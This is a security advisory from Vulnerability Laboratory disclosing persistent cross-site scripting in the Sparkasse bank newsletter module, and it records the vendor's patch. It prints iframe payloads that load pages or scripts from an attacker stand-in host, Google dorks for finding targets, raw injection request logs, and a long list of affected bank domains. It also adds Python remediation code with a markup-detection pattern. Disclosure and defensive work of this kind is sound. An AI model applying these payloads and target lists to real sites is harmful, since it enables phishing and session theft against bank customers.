Sparkasse - Multiple Persistent Cross Site Vulnerabilities

2019-03-07 00:00:00
Vulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri (https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
www.vulnerability-lab.com
Document Title:
===============
Sparkasse - Multiple Persistent Cross Site Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2173


Release Date:
=============
2019-03-07


Vulnerability Laboratory ID (VL-ID):
====================================
2173


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
4.000€ - 5.000€


Product & Service Introduction:
===============================
A savings bank (Sparkasse) is a credit institution whose task is to offer broad sections of the population opportunities 
for financial investment, to carry out payment transactions and to meet local credit needs, including those of small 
and medium-sized enterprises.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Sparkasse )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the Sparkasse online service web application.


Vulnerability Disclosure Timeline:
==================================
2018-10-25: Researcher Notification & Coordination (Security Researcher)
2018-10-26: Vendor Notification (S-CERT Department)
2018-10-29: Vendor Response/Feedback (S-CERT Department)
2019-02-20: Vendor Fix/Patch (Service Developer Team)
2018-**-**: Security Acknowledgements (S-CERT Department)
2019-03-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Sparkasse
Product: Mailing Server - Online Service (Web-Application) 2018 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Sparkasse online service newsletter web application. 
Remote attackers without a privileged account are able to inject their own malicious script code on the application side of the vulnerable service module.

The vulnerability is located in the `firstname`, `lastname` and `companyname` values of the `newsletter` module. The vulnerable parameters 
are f[1][v], f[2][v] and f[3][v]. Remote attackers can inject their own malicious script code via a POST request to the newsletter opt-in 
form endpoint of an affected Sparkasse domain; the injected code is stored on the application side. No authenticated account is required, 
because the injection takes place during the initial newsletter registration, before any activation step. The injection points are the 
vulnerable input fields; the stored code executes when the generated newsletter content is rendered, either in the email itself or on the 
`mailing.sparkasse.de` or unique `*sparkasse.de` "view online" pages, which a client reaches with a GET request.

The issue affects every page that embeds the newsletter module. The module is supplied by a single service provider and integrated 
into many different Sparkasse domains, so one flaw in it is present across the Sparkasse domain landscape and allows email spoofing, 
phishing, cross site requests that redirect to malware or exploits, and persistent manipulation of stored (DBMS) content shown on 
Sparkasse domains. By crawling with several Google dorks we identified a large list of affected Sparkasse web applications. A targeted 
user cannot tell that the manipulated newsletter is unsafe, because the content is delivered from the trusted native source, the Sparkasse mailing API.

The security risk of the persistent web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System v3) score of 4.6. 
Exploitation of the persistent input validation web vulnerability requires low user interaction and no privileged application user account.
Successful exploitation results in session hijacking, persistent phishing, persistent external redirects to malicious sources 
and persistent manipulation of the affected or connected web module content.

Request Method(s):
[+] POST

Vulnerable Module(s): 
[+] Newsletter

Vulnerable Input(s): 
[+] Vorname
[+] Nachname
[+] Firmenname

Vulnerable Parameter(s): 
[+] f[1][v]
[+] f[2][v]
[+] f[3][v]

Affected Domain(s):
[+] mailing.sparkasse.de
[+] other unique domains like news.sparkasse ...


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

Google Dorks: 
allinurl:sparkasse /de/home/service/newsletter.html
allinurl:sparkasse newsletter.html?n=true

Google Dork URL: 
https://www.google.com/search?q=allinurl:sparkasse+/de/home/service/newsletter.html
https://www.google.com/search?q=allinurl:sparkasse+newsletter.html%3Fn%3Dtrue



Payload: Phishing
test"><iframe src=http://www.evil.source.com/poc.html></iframe>

Payload: Session Hijacking
test"><iframe src=http://www.evil.source.com/ onload=alert(document.cookie)></iframe>
test"><iframe src=http://www.evil.source.com/ onload=alert(document.domain)></iframe>

Payload: Malware or Exploit
test"><iframe src=http://www.evil.source.com/poc.js></iframe>

Payload: Redirect
test"><iframe src=http://www.evil.source.com/ onload="top.location='http://...'"></iframe>



PoC: Demo URLs (Examples)
https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1
https://mailing.sparkasse.de/-viewonline2/6511/457/1029/961H3567/80CK9NcUj9/1
https://news.sparkasse-allgaeu.de/-viewonline2/6620/759/2129/tmBn69YJ/kU02LY1vXk/1



--- PoC Session Logs (POST) [Inject] ---
https://www.sparkasse-aachen.de/content/myif/spk-aachen/work/filiale/de/home/misc/vps/gate/_jcr_content.bin/emma/api/rest/39050000/optinsetup/5/form
Host: www.sparkasse-aachen.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 324
Cookie: JSESSIONID=0000IkwJ8m_99MAwctzQGQvKqQ7:559eb1d1d; IF6CONTEXT=SVBTVEFOREFSRDozOTA1MDAwMDpkZTpJRjpmYWxzZTpzcGstYWFjaGVu; 
IFCLONE=559eb1d1d; IF_SPKDE_CHECK=SPKDE_CHECK; vpi-3117116-SPKDE16=rd901o00000000000000000000ffffac10c6c0o80; vpi-3117116-emma_session=eyJpdiI6IlZTV3o5bVNtMm5hOCthNm9cLzRvOEVnPT0iLCJ2YWx1ZSI6IjNCNTZQYnZNT2tDUkpZZTREQ01pTGtKVllLRUd0ZjQwYkhHSTExalErNm
RqMzV2QTBcL3hDc1wvSndUXC9YNk5rK0tQOEF6UGRrR2JHcEgzNCtMZVg4QitRPT0iLCJtYWMiOiIwNTdlZDUzMWU1NGUzNTBkZDkxMTE1MTk5OWRmMWI2ZDRmMmY1M
TEzMzdmM2E0MDMxZTMyZmFkMjdjZThkNTIxIn0%3D
Connection: keep-alive
f[0][i]=1&f[0][v][email protected]&f[1][i]=5&f[1][v]=a<iframe src=http://www.evil.source.com/ 
onload=alert(document.cookie)>&f[2][i]=7&f[2][v]=b<iframe src=http://www.evil.source.com/ onload=alert(document.cookie)>
&f[3][v]=<iframe src=http://www.evil.source.com/ onload=alert(document.cookie)>[i]=11&f[3][v]=1&l[]=1,5,3,9,7,37
-
POST: HTTP/1.1 200 OK
X-UA-Compatible: IE=edge
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache
Content-Length: 59
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Language: de-DE


--- PoC Session Logs (GET) [Execute] ---
https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1
Host: mailing.sparkasse.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: SPK_COOKIE=YmFua2NvZGU9NzY1NTAwMDA%3D; TCPID=118104211048178479492; s_fid=65EF7EF7E0BBFBFC-20A9728F3A9D422B; 
s_cc=true; TC_OPTOUT=0@@@017@@@ALL; s_sq=spfgmbhsdeprod%3D%2526c.%2526a.%2526activitymap.%2526page%253Dservice%25253
Afilialsuche%2526link%253D%2525C3%252584ndern%2526region%253Dbank%2526pageIDType%253D1%2526.activitymap%2526.a%2526.c
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset="UTF-8"
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip



PoC: Source (Email & Web Pages)
<table style="margin:0px auto; width:600px;" class="c100" width="600" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" align="center">
<tbody><tr><td colspan="3" height="25">&nbsp;</td></tr>
<tr>
    	<td class="c5" width="25">&nbsp;</td>
        <td class="c90" width="550" valign="top">
        	<table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
            	<tbody><tr>
                	<th style="font-weight: normal;" class="col" valign="top" align="left">
                    	<table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
                        	<tbody><tr>
                            	<td style="font-family:Arial, Helvetica, sans-serif; font-size:12px; line-height:18px; color:#333333;" align="left">
                                	<strong>Dear Ms b"&gt;<iframe>%20>"<iframe src=evil.source>[EXECUTION POINT!],</strong><br /><br />
                                    have you already been on holiday, or are the best days of the year still ahead of you? In our first article we report 
on the current holiday trends of Germans. You can use the practical Kwitt app all year round. Read how easy it is to transfer money from phone to phone 
with this application inside your "Sparkasse" app, for example to split the bill from your last visit to your favourite Italian restaurant. 
We also inform you, among other things, about how best to proceed if you have reason to complain while on holiday. &nbsp;<br>
</td>
</tr>


Affected Domain(s):
===================
Sparkasse Domains:
https://www.sparkasse-ansbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wiehl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-vogtland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-allgaeu.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-iserlohn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wuppertal.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-offenburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-nuernberg.de/de/home/service/Newsletter.html?n=true
https://www.sparkasse-ffb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dachau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-freiburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-landshut.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-emh.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-krefeld.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-passau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-moenchengladbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bremen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dillingen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-rhein-maas.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-adl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-holstein.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-luedenscheid.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dueren.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heidelberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hochsauerland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saarbruecken.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-delbrueck.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dortmund.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hanau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-pfaffenhofen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-fuerth.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-donnersberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-freising.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neumarkt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html
https://www.sparkasse-suew.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-celle.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neuss.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bielefeld.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-radevormwald.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bamberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dieburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-soestwerl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-emsland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-kehl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-schwandorf.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neunkirchen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-lev.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-vorderpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hagenherdecke.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-zollernalb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-pforzheim-calw.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wa-fkb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-co-lif.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-elmshorn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-amberg-sulzbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-lippstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-olpe.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-finnentrop.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heilbronn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saalfeld-rudolstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-blomberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-darmstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bodensee.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-herford.de/de/home/immobilien/newsletter.html?n=true
https://www.sparkasse-hannover.de/de/home/ihre-sparkasse/newsletter.html?n=true
https://www.sparkasse-mittelfranken-sued.de/de/home/ihre-sparkasse/newsletter.html?n=true
https://www.sparkasse-lemgo.de/de/home/privatkunden/junge-leute/flexibel-durchstarten/S-Club/anmeldung-newsletter.html?n=true
https://www.sparkasse-rhein-neckar-nord.de/de/home/ihre-sparkasse/ihre-sparkasse-vor-ort/newsletter.html?n=true

Sparkasse Unique Domains:
https://www.berliner-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.herner-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.foerde-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.rhoen-rennsteig-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.ksk-walsrode.de/de/home/service/newsletter.html?n=true
https://www.ospa.de/de/home/ihre-sparkasse/newsletter.html?n=true

Sparkasse Muster Systems & Partners:
https://partner.meine-sparkasse.de/partner/69051620/58/?blz=69051620&site=
https://sparkasse-musterstadt.if-einblick.de/de/home/service/newsletter.html?n=true
https://sparkasse-musterstadt-svrp.if-einblick.de/de/home/service/newsletter.html?n=true
https://sparkasse-musterstadt-sgvht.if-einblick.de/de/home/service/newsletter.html?n=true


Solution - Fix & Patch:
=======================
1. The vulnerability can be patched by parsing and encoding the vulnerable `firstname`, `lastname` and `companyname` input fields 
in all affected newsletter modules, by an automated or manual update. Sparkasse Kassel resolved the issue after the first incident 
and can serve as a reference.

2. Restrict the affected input fields and disallow special characters to prevent malicious script code injection. This is a 
defence-in-depth measure; output encoding (items 3 and 4) remains the primary fix. 

3. Escape or safely encode the name parameter content in the HTML template generated on the affected Sparkasse mailing or unique domain pages.

4. Sanitize the affected name parameters in the outgoing emails sent through the Sparkasse mail server to finally resolve the vulnerability.

5. Integrate a secure process so that any vulnerability tracked and reported to the banks enters the patch cycle, ensuring 
that vulnerability issues cannot become major infrastructure issues overnight.

Note: The issue was reported to Finanz Informatik in 2018 Q4 and forwarded to the S-CERT team of the Sparkasse.
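The following Python is an added example, not code from the original advisory or from Sparkasse, Finanz Informatik or their service provider. It models the flow described in the technical details (opt-in POST in the f[n][i]/f[n][v] encoding, stored value rendered into the greeting of the newsletter) and applies fixes 2, 3 and 4 from the list above: an allow-list for the name fields before storage, HTML encoding at the point of rendering, and a sweep over already stored subscriber records for markup. The mapping of numeric field ids to email/firstname/lastname/companyname, the sample POST body, the greeting template and the subscriber records are constructed assumptions for the demonstration.

```python
import html
import re
from urllib.parse import parse_qsl

# Mapping of the form's numeric field ids to the advisory's field names. The ids
# (1, 5, 7, 11) are read off the advisory's POST log; the mapping itself is an
# assumption for this example, not a documented API.
FIELD_IDS = {"1": "email", "5": "firstname", "7": "lastname", "11": "companyname"}
NAME_FIELDS = ("firstname", "lastname", "companyname")

# Constructed opt-in POST body in the f[n][i]/f[n][v] encoding, with the
# advisory's iframe payload placed in the last name field.
SAMPLE_BODY = (
    "f[0][i]=1&f[0][v]=subscriber%40example.invalid"
    "&f[1][i]=5&f[1][v]=Erika"
    "&f[2][i]=7&f[2][v]=a%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.evil.source.com%2F"
    "%20onload%3Dalert(document.cookie)%3E"
    "&f[3][i]=11&f[3][v]=Example%20GmbH"
)

# Template fragment modelled on the greeting line shown in the PoC source (assumed).
GREETING_TEMPLATE = "<strong>Dear Ms {lastname},</strong>"

# Allow-list for name fields: Unicode letters plus apostrophe, period, space and
# hyphen, 1 to 80 characters. Digits and every markup character are rejected.
NAME_ALLOWED = re.compile(r"(?:[^\W\d_]|[' .\-]){1,80}")

# Markup indicators for sweeping records that were stored before the fix.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:", re.IGNORECASE)


def parse_optin_body(body: str) -> dict:
    """Decode the f[n][i]/f[n][v] pairs into {field_name: raw_value}."""
    pairs = dict(parse_qsl(body, keep_blank_values=True))
    fields, n = {}, 0
    while f"f[{n}][i]" in pairs:
        field_id = pairs[f"f[{n}][i]"]
        fields[FIELD_IDS.get(field_id, f"field_{field_id}")] = pairs.get(f"f[{n}][v]", "")
        n += 1
    return fields


def validate_name(value: str) -> bool:
    """Fix 2: reject anything outside the name allow-list before it is stored."""
    return NAME_ALLOWED.fullmatch(value) is not None


def render_greeting_vulnerable(fields: dict) -> str:
    """The behaviour the advisory reports: the raw stored value lands in the HTML."""
    return GREETING_TEMPLATE.format(lastname=fields["lastname"])


def render_greeting_fixed(fields: dict) -> str:
    """Fixes 3 and 4: HTML-encode at the point where the value enters the template."""
    return GREETING_TEMPLATE.format(lastname=html.escape(fields["lastname"], quote=True))


def process_optin(body: str) -> dict:
    """Parse a request, validate the name fields, render the greeting only if all are clean."""
    fields = parse_optin_body(body)
    rejected = [f for f in NAME_FIELDS if f in fields and not validate_name(fields[f])]
    return {
        "fields": fields,
        "rejected": rejected,
        "greeting": None if rejected else render_greeting_fixed(fields),
    }


def find_injected_records(records: list) -> list:
    """Sweep stored subscriber records for markup in name fields; returns (email, field) pairs."""
    hits = []
    for rec in records:
        for field in NAME_FIELDS:
            if MARKUP_RE.search(rec.get(field, "")):
                hits.append((rec.get("email"), field))
    return hits


# Constructed subscriber records: one clean (with a legitimate ampersand and
# apostrophe), one carrying the advisory's phishing payload.
SAMPLE_RECORDS = [
    {"email": "alice@example.invalid", "firstname": "Alice", "lastname": "Mustermann",
     "companyname": "O'Brien & Sons"},
    {"email": "mallory@example.invalid", "firstname": "test",
     "lastname": 'test"><iframe src=http://www.evil.source.com/poc.html></iframe>',
     "companyname": ""},
]

if __name__ == "__main__":
    fields = parse_optin_body(SAMPLE_BODY)
    print("vulnerable:", render_greeting_vulnerable(fields))
    print("fixed:     ", render_greeting_fixed(fields))
    print("rejected:  ", process_optin(SAMPLE_BODY)["rejected"])
    print("injected:  ", find_injected_records(SAMPLE_RECORDS))
```

The allow-list is deliberately narrow and is only a second line of defence: the encoding in `render_greeting_fixed` is what actually neutralizes a payload that slips through, and the same encoding must be applied in every template that consumes these fields (email body and the "view online" page alike). The sweep in `find_injected_records` is for the incident response side of the fix, since records injected before the patch remain in the database and are re-rendered with every mailing.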


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the web application module is estimated as medium.
The vulnerability can be used to deliver malicious or malformed content in order to phish users or to steal session data with little effort.
Targeted users cannot see that the delivered content does not come from the original Sparkasse source.


Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri (https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by the Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website are trademarks of the Vulnerability-Lab team and the specific authors or managers. To record, list, modify, use or 
edit our material, contact (admin@ or research@) to ask for permission.

				    Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™